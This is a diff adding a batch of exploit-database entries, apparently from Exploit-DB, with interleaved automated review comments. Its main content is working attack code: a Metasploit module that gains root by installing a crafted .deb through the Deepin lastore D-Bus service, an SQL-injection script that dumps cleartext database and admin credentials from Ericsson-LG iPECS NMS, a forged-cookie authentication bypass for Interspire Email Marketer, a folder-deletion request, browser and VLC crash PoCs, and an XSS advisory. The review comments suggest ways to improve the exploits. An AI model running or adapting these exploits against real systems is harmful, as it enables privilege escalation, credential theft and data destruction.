+ rm_f path + write_file path, data + register_file_for_cleanup path + end + + def upload_and_chmodx(path, data) + upload path, data + cmd_exec "chmod +x '#{path}'" + end + + def command_exists?(cmd) + cmd_exec("command -v #{cmd} && echo true").include? 'true' + end + + def dbus_priv? + res = install_package '', '' + (res.include? 'DBus.Error.AccessDenied') ? false : true + end + + def install_package(name, path) + dbus_send dest: 'com.deepin.lastore', + type: 'method_call', + path: '/com/deepin/lastore', + interface: 'com.deepin.lastore.Manager.InstallPackage', + contents: "string:'#{name}' string:'#{path}'" + end + + def remove_package(name) + dbus_send dest: 'com.deepin.lastore', + type: 'method_call', + path: '/com/deepin/lastore', + interface: 'com.deepin.lastore.Manager.RemovePackage', + contents: "string:' ' string:'#{name}'" + end + + def dbus_send(dest:, type:, path:, interface:, contents:) + cmd_exec "dbus-send --system --print-reply --dest=#{dest} --type=#{type} #{path} #{interface} #{contents}" + end + + def check + %w(lastore-daemon dpkg-deb dbus-send).each do |cmd| + unless command_exists? cmd + vprint_error "#{cmd} is not installed. Exploitation will fail." + return CheckCode::Safe + end + vprint_good "#{cmd} is installed" + end + + unless dbus_priv? + vprint_error 'User is not permitted to install packages. Exploitation will fail.' + return CheckCode::Safe + end + vprint_good 'User is permitted to install packages' + + CheckCode::Appears + end + + def exploit + if is_root? + fail_with Failure::BadConfig, 'Session already has root privileges' + end + + if check != CheckCode::Appears + fail_with Failure::NotVulnerable, 'Target is not vulnerable' + end + + print_status 'Building package...' 
+ + payload_name = ".#{rand_text_alphanumeric rand(10..15)}" + payload_path = "#{base_dir}/#{payload_name}" + pkg_name = rand_text_alphanumeric rand(10..15) + pkg_path = "#{base_dir}/.#{pkg_name}" + + mkdir "#{pkg_path}/DEBIAN" + pkg = "Package: #{pkg_name}\n" + pkg << "Version: 0.1\n" + pkg << "Maintainer: #{pkg_name}\n" + pkg << "Architecture: all\n" + pkg << "Description: #{pkg_name}\n" + upload "#{pkg_path}/DEBIAN/control", pkg + upload_and_chmodx "#{pkg_path}/DEBIAN/postinst", "#!/bin/sh\n#{payload_path} &" + + cmd_exec "dpkg-deb --build '#{pkg_path}'" + + unless file_exist? "#{pkg_path}.deb" + fail_with Failure::Unknown, 'Building package failed' + end + + print_status 'Uploading payload...' + upload_and_chmodx payload_path, generate_payload_exe + + print_status 'Installing package...' + res = install_package pkg_name, "#{pkg_path}.deb" + vprint_line res + + unless res.include? 'object path' + fail_with Failure::Unknown, 'Package installation failed. Check /var/log/lastore/daemon.log' + end + + Rex.sleep 15 + + print_status 'Removing package...' + res = remove_package pkg_name.downcase + vprint_line res + + unless res.include? 'object path' + print_warning 'Package removal failed. Check /var/log/lastore/daemon.log' + end + end +end \ No newline at end of file diff --git a/exploits/multiple/dos/44526.txt b/exploits/multiple/dos/44526.txt new file mode 100644 index 000000000..1816c5114 --- /dev/null +++ b/exploits/multiple/dos/44526.txt @@ -0,0 +1,7 @@ +The attached fuzzed swf file causes heap overflow when playing a sound. + +This PoC crashes a little bit unreliably, it is the most reliable in the standalone Flash player and Microsoft Edge. + + +Proof of Concept: +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44526.zip \ No newline at end of file diff --git a/exploits/multiple/dos/44527.txt b/exploits/multiple/dos/44527.txt new file mode 100644 index 000000000..eabbf304e --- /dev/null 
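Review bot: `check` is not side-effect free: `dbus_priv?` issues a real `com.deepin.lastore.Manager.InstallPackage` method call with empty arguments to choose between `CheckCode::Safe` and `CheckCode::Appears`, so running `check` alone already talks to the system bus and presumably leaves a trace in the daemon log the module itself points at (`/var/log/lastore/daemon.log`). Document that on the method, e.g. `# NOTE: check is not passive - dbus_priv? sends an InstallPackage call with empty arguments`, and mention it in the module Description. The `Rex.sleep 15` after `install_package` is a fixed wait with no explanation of what it waits for; a one-line comment stating the reason would help, hedged as an assumption if it is only empirical.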
+++ b/exploits/multiple/dos/44527.txt @@ -0,0 +1,7 @@ +The attached fuzzed swf file causes heap or stack corruption (depending on platform) when rendering a slab. + +This PoC crashes a little bit unreliably, it is the most reliable in the standalone Flash player and Microsoft Edge. + + +Proof of Concept: +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44527.zip \ No newline at end of file diff --git a/exploits/multiple/dos/44528.txt b/exploits/multiple/dos/44528.txt new file mode 100644 index 000000000..178176d34 --- /dev/null +++ b/exploits/multiple/dos/44528.txt @@ -0,0 +1,7 @@ +The attached image causes an info leak in image inflation. It occasionally crashes when rendered, otherwise it displays uninitialized memory as pixels. + +To reproduce, put the attached images on a webserver and vist: http://127.0.0.1?img=inflate.png. + + +Proof of Concept: +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44528.zip \ No newline at end of file diff --git a/exploits/multiple/dos/44529.txt b/exploits/multiple/dos/44529.txt new file mode 100644 index 000000000..7b032f1fc --- /dev/null +++ b/exploits/multiple/dos/44529.txt @@ -0,0 +1,7 @@ +The attached swf file causes and out-of-bounds write in blur filtering. + +This PoC crashes reliably in Firefox for Linux. + + +Proof of Concept: +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44529.zip \ No newline at end of file diff --git a/exploits/multiple/dos/44530.js b/exploits/multiple/dos/44530.js new file mode 100644 index 000000000..8d645de52 --- /dev/null +++ b/exploits/multiple/dos/44530.js 
@@ -0,0 +1,80 @@
+/*
+https://cs.chromium.org/chromium/src/v8/src/compiler/node-properties.cc?rcl=df84e87191022bf6914f9570069908f10b303245&l=416
+
+Here's a snippet of NodeProperties::InferReceiverMaps.
+ case IrOpcode::kJSCreate: {
+ if (IsSame(receiver, effect)) {
+ HeapObjectMatcher mtarget(GetValueInput(effect, 0));
+ HeapObjectMatcher mnewtarget(GetValueInput(effect, 1));
+ if (mtarget.HasValue() && mnewtarget.HasValue()) {
+ Handle original_constructor =
+ Handle::cast(mnewtarget.Value());
+
+ if (original_constructor->has_initial_map()) {
+ Handle initial_map(original_constructor->initial_map());
+ if (initial_map->constructor_or_backpointer() ==
+ *mtarget.Value()) {
+ *maps_return = ZoneHandleSet(initial_map);
+ return result;
+ }
+ }
+ }
+ // We reached the allocation of the {receiver}.
+ return kNoReceiverMaps;
+ }
+ break;
+ }
+
+"mnewtarget" is expected to be a constructor which also can be of type JSBoundFunction. But "mnewtarget" is always cast to JSFunction which leads to type confusion.
+
+The PoC seems not to crash in release mode.
+
+Debug mode log:
+#
+# Fatal error in ../../src/objects-inl.h, line 566
+# Check failed: !v8::internal::FLAG_enable_slow_asserts || (object->IsJSFunction()).
+#
+
+==== C stack trace ===============================
+
+ /v8/out.gn/x64.debug/./libv8_libbase.so(v8::base::debug::StackTrace::StackTrace()+0x1e) [0x7f4623e1043e]
+ /v8/out.gn/x64.debug/./libv8_libplatform.so(+0x30907) [0x7f4623db3907]
+ /v8/out.gn/x64.debug/./libv8_libbase.so(V8_Fatal(char const*, int, char const*, ...)+0x1bd) [0x7f4623df876d]
+ /v8/out.gn/x64.debug/./libv8.so(v8::internal::JSFunction::cast(v8::internal::Object*)+0x64) [0x7f46226584a4]
+ /v8/out.gn/x64.debug/./libv8.so(v8::internal::Handle const v8::internal::Handle::cast(v8::internal::Handle)+0x23) [0x7f4622651173]
+ /v8/out.gn/x64.debug/./libv8.so(v8::internal::compiler::NodeProperties::InferReceiverMaps(v8::internal::compiler::Node*, v8::internal::compiler::Node*, v8::internal::ZoneHandleSet*)+0x435) [0x7f4622c24a75]
+ /v8/out.gn/x64.debug/./libv8.so(v8::internal::compiler::JSNativeContextSpecialization::InferReceiverMaps(v8::internal::compiler::Node*, v8::internal::compiler::Node*, std::__1::vector, std::__1::allocator > >*)+0x50) [0x7f4622b8b820]
+ /v8/out.gn/x64.debug/./libv8.so(v8::internal::compiler::JSNativeContextSpecialization::ExtractReceiverMaps(v8::internal::compiler::Node*, v8::internal::compiler::Node*, v8::internal::FeedbackNexus const&, std::__1::vector, std::__1::allocator > >*)+0x202) [0x7f4622b82632]
+ /v8/out.gn/x64.debug/./libv8.so(v8::internal::compiler::JSNativeContextSpecialization::ReduceNamedAccessFromNexus(v8::internal::compiler::Node*, v8::internal::compiler::Node*, v8::internal::FeedbackNexus const&, v8::internal::Handle, v8::internal::compiler::AccessMode)+0x2e6) [0x7f4622b822b6]
+ /v8/out.gn/x64.debug/./libv8.so(v8::internal::compiler::JSNativeContextSpecialization::ReduceJSStoreNamed(v8::internal::compiler::Node*)+0x298) [0x7f4622b7c2c8]
+ /v8/out.gn/x64.debug/./libv8.so(v8::internal::compiler::JSNativeContextSpecialization::Reduce(v8::internal::compiler::Node*)+0x11f) [0x7f4622b78f7f]
+ 
/v8/out.gn/x64.debug/./libv8.so(v8::internal::compiler::GraphReducer::Reduce(v8::internal::compiler::Node*)+0x285) [0x7f4622ad8c55]
+ /v8/out.gn/x64.debug/./libv8.so(v8::internal::compiler::GraphReducer::ReduceTop()+0x44f) [0x7f4622ad874f]
+ /v8/out.gn/x64.debug/./libv8.so(v8::internal::compiler::GraphReducer::ReduceNode(v8::internal::compiler::Node*)+0x1bc) [0x7f4622ad7cfc]
+ /v8/out.gn/x64.debug/./libv8.so(v8::internal::compiler::GraphReducer::ReduceGraph()+0x2d) [0x7f4622ad89bd]
+ /v8/out.gn/x64.debug/./libv8.so(v8::internal::compiler::InliningPhase::Run(v8::internal::compiler::PipelineData*, v8::internal::Zone*)+0x58a) [0x7f4622c46e2a]
+
+PoC:
+*/
+
+// Flags: --allow-natives-syntax --enable_slow_asserts
+
+class Base {
+ constructor() {
+ this.x = 1;
+ }
+}
+
+class Derived extends Base {
+ constructor() {
+ // JSCreate emitted I guess.
+ super();
+ }
+}
+
+let bound = Object.bind();
+Reflect.construct(Derived, [], bound); // Feed a bound function as new.target to the profiler, so HeapObjectMatcher can find it.
+
+%OptimizeFunctionOnNextCall(Derived);
+
+new Derived();
\ No newline at end of file
diff --git a/exploits/php/webapps/44503.txt b/exploits/php/webapps/44503.txt
new file mode 100644
index 000000000..0d8ead63a
--- /dev/null
+++ b/exploits/php/webapps/44503.txt
@@ -0,0 +1,51 @@ +# Exploit Title: UK Cookie Consent v2.3.9 - Persistent Cross-Site Scripting +# Date: 2018-04-22 +# Exploit Author: B0UG +# Vendor Homepage: https://catapultthemes.com/ +# Software Link: https://en-gb.wordpress.org/plugins/uk-cookie-consent/#description +# Version: Tested on version 2.3.9 (older versions may also be affected) +# Tested on: WordPress +# Category : Webapps +# CVE: CVE-2018-10310 + +I. VULNERABILITY +------------------------- +Persistent Cross-Site Scripting + +II. BACKGROUND +------------------------- +UK Cookie Consent is a WordPress plugin which has been designed to display cookie consent notifications on a WordPress website. + +III. DESCRIPTION +------------------------- +A persistent cross-site scripting vulnerability has been identified in the web interface of the plugin that allows the execution of arbitrary HTML/script code to be executed in a victim's web browser. + +IV. PROOF OF CONCEPT +------------------------- +1) Access WordPress control panel. +2) Navigate to the 'Pages'. +3) Add a new page and insert the script you wish to inject into the page title. +4) Now navigate to 'Settings' and select 'Cookie Consent'. +5) Now click on the 'Content' tab. +6) Your injected script will now be executed. + +V. IMPACT +------------------------- +An attacker can execute malicious code in a victim user's browser to perform various activities such as stealing cookies, session tokens, credentials and personal data amongst others. + +VI. SYSTEMS AFFECTED +------------------------- +WordPress websites running "UK Cookie Consent" plugin version 2.3.9 (older versions may also be affected). + +VII. REMEDIATION +------------------------- +Update to the latest version available. Implement a web application such as Wordfence. + +VIII. DISCLOSURE TIMELINE +------------------------- +April 22, 2018 1: Vulnerability identified. +April 22, 2018 2: Informed developer of the vulnerability. +April 23, 2018 3: Developer acknowledged the vulnerability. 
+April 23, 2018 4: Developer issued a security patch. + +Special thanks goes to the team at Catapult Themes for their fast response, great understanding and patching the issue. \ No newline at end of file diff --git a/exploits/php/webapps/44504.txt b/exploits/php/webapps/44504.txt new file mode 100644 index 000000000..dc6841527 --- /dev/null +++ b/exploits/php/webapps/44504.txt @@ -0,0 +1,23 @@ +# Exploit Title: WUZHI CMS 4.1.0 - Cross-Site Request Forgery +# Date: 2018-04-23 +# Exploit Author: jiguang (s1@jiguang.in) +# Vendor Homepage: https://github.com/wuzhicms/wuzhicms +# Software Link: https://github.com/wuzhicms/wuzhicms +# Version: 4.1.0 +# CVE: CVE-2018-10312 + +An issue was discovered in WUZHI CMS 4.1.0 (https://github.com/wuzhicms/wuzhicms/issues/132) +There is a csrf vulnerability that can modifying the member's password. via index.php?m=member&v=pw_reset +After the member logged in. open the exp page + + + + +
+ + + + +
+ + \ No newline at end of file diff --git a/exploits/php/webapps/44512.txt b/exploits/php/webapps/44512.txt new file mode 100644 index 000000000..b01273b7b --- /dev/null +++ b/exploits/php/webapps/44512.txt @@ -0,0 +1,44 @@ +# Exploit Title: Monstra CMS 3.0.4 allows remote attackers to delete folder via an get request +# Date: 2018-03-26 +# Exploit Author: Wenming Jiang +# Vendor Homepage: https://github.com/monstra-cms/monstra +# Software Link: https://github.com/monstra-cms/monstra +# Version: 3.0.4 +# Tested on: macos 10.12.6, php 5.6, apache2.2.29 +# CVE :CVE-2018-9038 + + +Description: +Monstra CMS 3.0.4 allows remote attackers to delete folder via an admin/index.php?id=filesmanager&delete_dir=./&path=uploads/ request. + + +Steps to Reproduce: +1、Log in as a user with page editing permissions +2、Request http://your_site/admin/index.php?id=filesmanager&delete_dir=./&path=uploads +3、The uploads folder will be deleted. + + +Poc code: +GET /monstra/admin/index.php?id=filesmanager&delete_dir=./&path=uploads/&token=008708df48237172f6fe2d173dc30529eac132de HTTP/1.1 +Host: localhost:8000 +Upgrade-Insecure-Requests: 1 +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.10 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 +Referer: http://localhost:8000/monstra/admin/index.php?id=filesmanager&path=uploads/ +Accept-Language: zh,zh-CN;q=0.9,en;q=0.8,zh-TW;q=0.7 +Cookie: SQLiteManager_currentLangue=2; PHPSESSID=882dd1e203c979cedba4524f8107eca3; _ga=GA1.1.1742657188.1524382699; _gid=GA1.1.918663288.1524382699 +Connection: close + + + +Vulnerability Type: +Insecure Permissions + + +Expected Behavior: +deleted uploads folder + + + +Possible Solutions: +Strictly filter the delete_dir parameter and replace './' with '_/' \ No newline at end of file 
diff --git a/exploits/php/webapps/44513.py b/exploits/php/webapps/44513.py
new file mode 100755
index 000000000..1609d812d
--- /dev/null
+++ b/exploits/php/webapps/44513.py
@@ -0,0 +1,156 @@ +''' +# Exploit Title: Interspire Email Marketer - Remote Admin Authentication Bypass +# Google Dork: intitle:"Control Panel" + emailmarketer +# Date: 4-22-18 +# Exploit Author: devcoinfet +# Vendor Homepage: www.interspire.com/emailmarketer +# Software Link: Can't legally provide link but can be found on net +# Version: [6.1.3-6.1.6] +# Tested on: Below 6.1.6 +# CVE : CVE-2017-14322 + +https://security.infoteam.ch/en/blog/posts/narrative-of-an-incident-response-from-compromise-to-the-publication-of-the-weakness.html +https://github.com/joesmithjaffa/CVE-2017-14322 +thanks to above Researchers + +1. Description + + + +this is used like this +-------------------------- +exploit.py url/email-marketer/admin/index.php + + +2. Proof of Concept +''' + + +import requests +import sys +from bs4 import BeautifulSoup +from pprint import pprint + + +def cookie_cutter(url): +    with requests.Session() as s: +       s.get(url) +       r = s.get(url) +       response_regex = r.text +       print("requesting initial Cookie\n") +       print(str(r.headers)+"\n") +       +       for key,value in s.cookies.items(): +           if key and "IEMSESSIONID" in key: +          +              s.cookies.set('IEM_CookieLogin', "YTo0OntzOjQ6InVzZXIiO3M6MToiMSI7czo0OiJ0aW1lIjtpOjE1MDU0NzcyOTQ7czo0OiJyYW5kIjtiOjE7czo4OiJ0YWtlbWV0byI7czo5OiJpbmRleC5waHAiO30%3D") +       print("Attempting To Posion 2nd request with Forged Cookie\n") +       print("-" * 25) +       r = s.get(url) +       response_regex2 = r.text +       print response_regex2 +       print(str(r.headers) + "\n") +       if response_regex != response_regex2: + +          for key,value in s.cookies.items(): +              if "IEMSESSIONID" in key: +                 try: +                    #using session riding from previous cookie we grab the info we want :) +                    bounce_info_grab(url,value) +                    app_info_grab(url,value) +                    privt_info_grab(url,value) +               
  except: +                     pass +                 return value,r.text + + +def bounce_info_grab(url,session_to_ride): +    url_grab = url+"?Page=Settings&Tab=2" +    print(url_grab) +    with requests.Session() as s: +       s.get(url_grab) +       s.cookies.set('IEMSESSIONID',session_to_ride) +       r = s.get(url_grab) +       response_regex = r.text +       soup = BeautifulSoup(response_regex,'html5lib') +       div = soup.find('div', id='div7') +      +        +       outfile = open("bounce_report.txt",'w') +       dataout = """ReportReport +                    """ + str(div) +"""""" +       outfile.write(dataout) +       outfile.close() +       for divy in div.contents: +           print(divy) +          +def app_info_grab(url,session_to_ride): +    url_grab = url+"?Page=Settings&Tab=2" +    print(url_grab) +    with requests.Session() as s: +       s.get(url_grab) +       s.cookies.set('IEMSESSIONID',session_to_ride) +       r = s.get(url_grab) +       response_regex = r.text +       soup = BeautifulSoup(response_regex,'html5lib') +       div = soup.find('div', id='div1') +    +        +       outfile = open("application_settings_report.txt",'w') +       dataout = """ReportReport +                    """ + str(div) +"""""" +       outfile.write(dataout) +       outfile.close() +       for divy in div.contents: +           print(divy)   +    +def privt_info_grab(url,session_to_ride): +    url_grab = url+"?Page=Settings&Tab=2" +    print(url_grab) +    with requests.Session() as s: +       s.get(url_grab) +       s.cookies.set('IEMSESSIONID',session_to_ride) +       r = s.get(url_grab) +       response_regex = r.text +       soup = BeautifulSoup(response_regex,'html5lib') +       div = soup.find('div', id='div8') +     +        +       outfile = open("privtlbl_settings_report.txt",'w') +       dataout = """ReportReport +                    """ + str(div) +"""""" +       outfile.write(dataout) +       outfile.close() +       for divy in div.contents: +      
     print(divy)   +    +def main(): +    url = sys.argv[1] +    print  "Evaluating Target:" +url+ """ For CVE-2017-14322"""+"\n" +    print "-" * 25 +    try: +       session_rider_value,content = cookie_cutter(url) +       print "Session Has Been Generated Entering Internal Data Dumping Routine"+"\n" +       print "-" * 25 +       print "Magic Cookie Generated Modify Existing IEMSESSIONID Value In browser With Below Value " +       print "-" * 25 +       print  session_rider_value+"\n" +       print "-" * 25 +    except: +       print "Target Is Not Vulnerable" +       pass +   +    + +main() + +''' +When Running this, if it is succesful check for 3 files in the directory of exploit to find crucial internal configs in Html format +do not use this for bad just dont do it please. +  + +3. Solution: +   +Update to version 6.1.6 atleast +http://www.interspire.com/emailmarketer +''' \ No newline at end of file diff --git a/exploits/php/webapps/44515.py b/exploits/php/webapps/44515.py new file mode 100755 index 000000000..8e2beeb2c --- /dev/null +++ b/exploits/php/webapps/44515.py 
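Review bot: The header docstring lists the affected range as `# Version: [6.1.3-6.1.6]` while the closing docstring's Solution says `Update to version 6.1.6 atleast`, so a reader cannot tell whether 6.1.6 is affected or the first fixed release; the commit title says `< 6.1.6`, so the header should read `# Version: [6.1.3-6.1.5]` or the solution should name the fixed version explicitly. As a point of style, `cookie_cutter` wraps the three `*_info_grab` calls in a bare `except: pass` and `main` does the same around `cookie_cutter`, so a network error, a non-matching page, or `div.contents` on a `None` result from `soup.find` is all reported as `Target Is Not Vulnerable`, which makes that verdict unreliable as a scan result. The file also mixes Python 2 `print` statements (`print response_regex2`, all of `main`) with `print(...)` calls, so the module is Python 2 only; a `#!/usr/bin/env python2` line or a comment in the header would make that explicit.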
@@ -0,0 +1,138 @@ +# -*- coding: utf-8 -*- + + +# Exploit Title: Ericsson-LG iPECS NMS - Cleartext Cred. Dump +# Vendor Notification: 03-03-2018 - No response +# Initial CVE: 04-04-2018 +# Disclosure: 21-04-2018 +# Exploit Author: Berk Cem Göksel +# Contact: twitter.com/berkcgoksel || bgoksel.com +# Vendor Homepage: http://www.ipecs.com/ +# Version: A.1Ac and possibly earlier +# Tested on: Windows 2008 R2 x64 +# CVE-2018-9245: Multiple SQL injections +# CVE-2018-10285: Incorrect access control +# CVE-2018-10286: Sensitive information disclosure + + +#--------Description--------# +# +# +# The Ericsson-LG iPECS NMS version A.1Ac and possibly earlier disclose sensitive +# information such as cleartext database and NMS login credentials, use incorrect +# access control mechanisms, are vulnerable to MiTM attacks and are prone to +# SQL injection attacks on multiple parameters. +# +# This script dumps some sensitive information. +# +# +# Why use it? +# +# Normally, you can bypass the login through the SQLi but will get "kicked out". +# Thankfully, we can leverage this to extract the actual admin credentials for +# the web app. In order to do this, we must first dump the database +# credentials in cleartext. +# +# + + + +# Usage = python cred_dump.py IP_adress port +# Example = python cred_dump.py 192.168.1.35 80 + + +from sys import argv +import sys +import os +import time +import requests +import re + + + +if len(argv) != 3: + + print "The script takes two mandatory arguments." + print "\nExample usage: python cred_dump.py 192.168.1.35 80" + sys.exit("Exiting...") + +arg,IP,port=argv + +#Log in through SQLi. Otherwise the next POST request is rejected. 
+sqli_path = "/nms/php/module/main/main_login.php" +sqli_url = "http://" + IP + ":" + port + sqli_path +sqli_cookies = {"mainTab_selectedChild": "sysinfoTab"} +sqli_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Referer": "http://192.168.1.55/index.html", "Connection": "close", "Upgrade-Insecure-Requests": "1", "Content-Type": "application/x-www-form-urlencoded"} +sqli_data={"id": "1", "passwd": "1' or 1=1--"} +r = requests.post(sqli_url, headers=sqli_headers, cookies=sqli_cookies, data=sqli_data) +print(r.status_code, r.reason) +time.sleep(1) + + +#Thanks to incorrect access control we can +#dump cleartext database credentials +dump_path = "/nms/php/module/main/main_start.php" +dump_url = "http://" + IP + ":" + port + dump_path +nms_cookie = {"mainTab_selectedChild": "sysinfoTab"} +nms_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0", "Accept": "*/*", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Referer": "http://192.168.1.55/nms/index.html", "Content-Type": "application/x-www-form-urlencoded", "X-Requested-With": "XMLHttpRequest", "Connection": "close"} +nms_data={"command": "nms_start", "client_id": "20"} +r2 = requests.post(dump_url, headers=nms_headers, cookies=nms_cookie, data=nms_data) +print(r2.status_code, r2.reason) + +db_cred_dump = r2.content +time.sleep(1) + +#Extract db user and db pass from the dump +m = re.search(r"db_user:'(.*)'.*db_pwd:'([^']*)", db_cred_dump) + +if m is not None: + postgre_db_user = m.group(1) + postgre_db_pwd = m.group(2) +else: + + print "Something went wrong parsing the credentials. Check the dump manually." 
+ + +client_id = "2" #Doesn't really matter +user_id = "10" #Doesn't matter either +db_user = postgre_db_user # This does matter +db_pwd = postgre_db_pwd # So does this + + +#Use db user and password to extract admin credentials for the NMS +users_path = "/nms/php/module/init/module_init.php" +users_url = "http://" + IP + ":" + port + users_path +users_cookies = {"mainTab_selectedChild": "sysinfoTab"} +users_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0", "Accept": "*/*", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Referer": "http://192.168.1.55/nms/index.html", "Content-Type": "application/x-www-form-urlencoded", "X-Requested-With": "XMLHttpRequest", "Connection": "close"} +users_data={"command": "init_configuration", "client_id": "2", "user_id": user_id, "db_user": db_user, "db_pwd": db_pwd, "mfimSeq": "0", "req_system_id": "0", "req_system_name": ''} +r3 = requests.post(users_url, headers=users_headers, cookies=users_cookies, data=users_data) + + +print(r3.status_code, r3.reason) + +user_dump = r3.content + + +print "Done. You can log in to the postgresql database using the below credentials." +print "\ndb_user: " + postgre_db_user +print "db_pwd: " + postgre_db_pwd +print "\nAnd/Or you can log in to the NMS using the following credentials" +m1 = re.search(r"userList:\[\[\d,'([^']*)','([^']*)", user_dump) + +if m1 is not None: + nms_admin = m1.group(1) + nms_pwd = m1.group(2) + print "\ndb_admin: " + nms_admin + print "db_pwd: " + nms_pwd +else: + print "\nDid not get nms_admin and nms_pwd. Check the dump manually." + + +dumpfile = open("ipecsnms_dump.txt","w") + +dumpfile.write(db_cred_dump) +dumpfile.write(user_dump) +dumpfile.close() + +print "\nRaw output written to ipecsnms_dump.txt for further username and group enumeration." +print "Have fun!" \ No newline at end of file 
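Review bot: When `re.search(r"db_user:'(.*)'.*db_pwd:'([^']*)", db_cred_dump)` finds no match, the `else` branch only prints a message and execution falls through to `db_user = postgre_db_user`, which raises `NameError` because that name was never bound; the branch should end the run, `sys.exit("Could not parse database credentials; check the dump manually.")`. The later `m1 is None` branch is harmless since nothing after it reads `nms_admin` or `nms_pwd`. The script also writes both raw responses, including any recovered cleartext credentials, to `ipecsnms_dump.txt` in the current directory; the usage comment at the top should state that so the file is handled and removed deliberately.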
diff --git a/exploits/php/webapps/44520.html b/exploits/php/webapps/44520.html new file mode 100644 index 000000000..7c2accafc --- /dev/null +++ b/exploits/php/webapps/44520.html @@ -0,0 +1,42 @@ + + +
+ + + +
+ + \ No newline at end of file diff --git a/exploits/windows/dos/44514.py b/exploits/windows/dos/44514.py new file mode 100755 index 000000000..a17d1d68b --- /dev/null +++ b/exploits/windows/dos/44514.py 
@@ -0,0 +1,62 @@
+"""
+VLC Media Player/Kodi/PopcornTime 'Red Chimera' < 2.2.5 Memory Corruption (PoC)
+Author: SivertPL (kroppoloe@protonmail.ch)
+CVE: CVE-2017-8311
+
+Infamous VLC/Kodi/PopcornTime subtitle attack in libsubtitle_plugin.dll.
+This is the Proof of Concept of the reverse engineered heap corruption vulnerability affecting JacoSUB parsing in VLC/Kodi/PopcornTime.
+The crash is exploitable, but hard to exploit because of various environmental constraints such as threading/mitigations/scriptless.
+I want to join a research team.
+"""
+
+"""
+ModLoad: 00000000`71660000 00000000`716a2000 C:\Program Files (x86)\VideoLAN\VLC\plugins\demux\libmp4_plugin.dll
+ModLoad: 00000000`71630000 00000000`71651000 C:\Program Files (x86)\VideoLAN\VLC\plugins\demux\libavi_plugin.dll
+ModLoad: 00000000`71610000 00000000`7162e000 C:\Program Files (x86)\VideoLAN\VLC\plugins\demux\libasf_plugin.dll
+ModLoad: 00000000`71600000 00000000`7160d000 C:\Program Files (x86)\VideoLAN\VLC\plugins\demux\libdemux_cdg_plugin.dll
+ModLoad: 00000000`715e0000 00000000`715fd000 C:\Program Files (x86)\VideoLAN\VLC\plugins\demux\libvobsub_plugin.dll
+ModLoad: 00000000`715d0000 00000000`715de000 C:\Program Files (x86)\VideoLAN\VLC\plugins\demux\libdemux_stl_plugin.dll
+ModLoad: 00000000`715b0000 00000000`715cf000 C:\Program Files (x86)\VideoLAN\VLC\plugins\demux\libsubtitle_plugin.dll
+core demux error: option sub-original-fps does not exist
+(33c.d10): Access violation - code c0000005 (first chance)
+First chance exceptions are reported before any exception handling.
+This exception may be expected and handled.
+*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files (x86)\VideoLAN\VLC\plugins\demux\libsubtitle_plugin.dll -
+libsubtitle_plugin+0x44de:
+715b44de 881f mov byte ptr [edi],bl ds:002b:1b9fb000=??
+0:012:x86> g
+(33c.d10): Access violation - code c0000005 (!!! second chance !!!)
+wow64!Wow64NotifyDebugger+0x1d:
+00000000`754ac9f1 654c8b1c2530000000 mov r11,qword ptr gs:[30h] gs:00000000`00000030=????????????????
+"""
+
+import os
+import struct
+import sys
+import argparse
+
+len = 1025
+
+def main(argv):
+ parser = argparse.ArgumentParser()
+ parser.add_argument("filename", help="Name of the movie file w/o extension, for generating payload")
+ parser.add_argument("--length", help="Heap overwrite length (default 1025, may be bigger)", type=int)
+ args = parser.parse_args()
+ if args.length:
+ global len
+ len = args.length
+ print "[+] Generating file %s.jss with overwrite size of %d" % (args.filename, len)
+ write(args.filename, len)
+
+def write(name, len):
+ subtitles = open("%s.jss" % name, "w+")
+ subtitles.write("0:00:02.00 0:00:04.00 VL red chimera..\n")
+ subtitles.write("0:00:04.00 0:00:05.00 vm attack")
+ subtitles.write("\\C")
+ subtitles.write(struct.pack('B', 0))
+ subtitles.write('A' * len)
+ subtitles.close()
+ print "[+] Done!"
+
+if __name__ == "__main__":
+ main(sys.argv[1:])
\ No newline at end of file
diff --git a/exploits/windows/dos/44525.py b/exploits/windows/dos/44525.py
new file mode 100755
index 000000000..0c74f5237
--- /dev/null
+++ b/exploits/windows/dos/44525.py
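Review bot: The module-level `len = 1025`, the `global len` rebinding in `main`, and the `len` parameter of `write` all shadow the builtin `len()` for the whole module, which is a readability hazard and would break any later `len(...)` call; rename it, e.g. `overwrite_len = 1025`, and pass it as `write(args.filename, overwrite_len)`. `import os` is unused and can be dropped. The file is Python 2 only (`print` statements), which the header docstring could state alongside the CVE line.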
@@ -0,0 +1,156 @@ +''' +[+] Credits: John Page (aka hyp3rlinx) +[+] Website: hyp3rlinx.altervista.org +[+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-INTERNET-EXPLORER-(Win-10)-DENIAL-OF-SERVICE.txt +[+] ISR: ApparitionSec + + +Vendor: +======= +www.microsoft.com + + +Product: +======== +Internet Explorer (Windows 10) +v11.371.16299.0 + +Internet Explorer is a series of graphical web browsers developed by Microsoft and included in the Microsoft Windows line of operating systems, starting in 1995. + + +Vulnerability Type: +================== +Denial Of Service + + +CVE Reference: +============== +N/A + + +Security Issue: +================ +A null pointer de-reference (read) results in an InternetExplorer Denial of Service (crash) when MSIE encounters an specially crafted +HTML HREF tag containing an empty reference for certain Windows file types. Upon IE crash it will at times daringly attempt to restart itself, +if that occurs and user is prompted by IE to restore their browser session, then selecting this option so far in my tests has shown to repeat the +crash all over again. This can be leveraged by visiting a hostile webpage or link to crash an end 